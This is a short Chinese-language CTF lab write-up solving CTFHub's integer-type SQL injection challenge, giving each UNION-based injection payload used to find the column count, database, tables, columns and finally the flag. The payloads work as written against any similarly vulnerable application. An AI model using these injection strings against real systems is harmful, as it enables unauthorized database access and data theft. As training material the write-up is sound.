CTFHUB技能树之SQL——整数型注入

开启靶场,打开链接:

直接指明是SQL整数型注入,但还是来判断一下


(1)检查是否存在注入点

1 and 1=1#

返回正确

1 and 1=2#

返回错误

说明存在SQL整数型注入


(2)猜字段数

1 order by 2#

1 order by 3#

说明字段数是2


(3)爆数据库名

1 and 1=2 union select 1,database()#

得知数据库名是sqli


(4)爆表名

1 and 1=2 union select 1,group_concat(table_name)from information_schema.tables where table_schema='sqli'#

显示表名是news表和flag表,其中flag表是我们需要的


(5)爆列名

1 and 1=2 union select 1,column_name from information_schema.columns where table_schema='sqli' and table_name='flag'#

得知flag表的列名是flag


(6)爆字段内容(flag)

1 and 1=2 union select 1,group_concat(flag) from sqli.flag#

成功的得到flag:

ctfhub{0bdb6d621fc76a06fde34a00}

这里用sqlmap也是可以的,但我提前交了就不想再费时间重开一遍靶场了,待会就在"字符型注入"中试试了

相关推荐
m0_4939345321 小时前
如何在 Go 中模拟 do-while 循环实现用户交互式重复执行
jvm·数据库·python
m0_7436239221 小时前
如何用 removeChild 与 remove 方法从页面 DOM 中移除元素
jvm·数据库·python
InfinteJustice21 小时前
JavaScript中null与undefined在双等号下的特殊性
jvm·数据库·python
geBR OTTE21 小时前
mysql重置root密码(适用于5.7和8.0)
数据库·mysql·adb
m0_6784854521 小时前
如何处理SQL空值填充_利用IFNULL函数保证数据完整性
jvm·数据库·python
m0_6845019821 小时前
实现一个可精确定位、支持左右移动与删除的文本光标系统
jvm·数据库·python
weixin_4087177721 小时前
HTML能写样式吗_style属性与内联样式风险【解答】
jvm·数据库·python
2501_9142459321 小时前
Python如何计算NumPy数组的协方差矩阵_调用cov函数进行特征分析
jvm·数据库·python
踏着七彩祥云的小丑21 小时前
ORM框架自学整理
数据库
Wyz2012102421 小时前
优化 PySpark 中嵌套数组爆炸(explode)性能的关键策略
jvm·数据库·python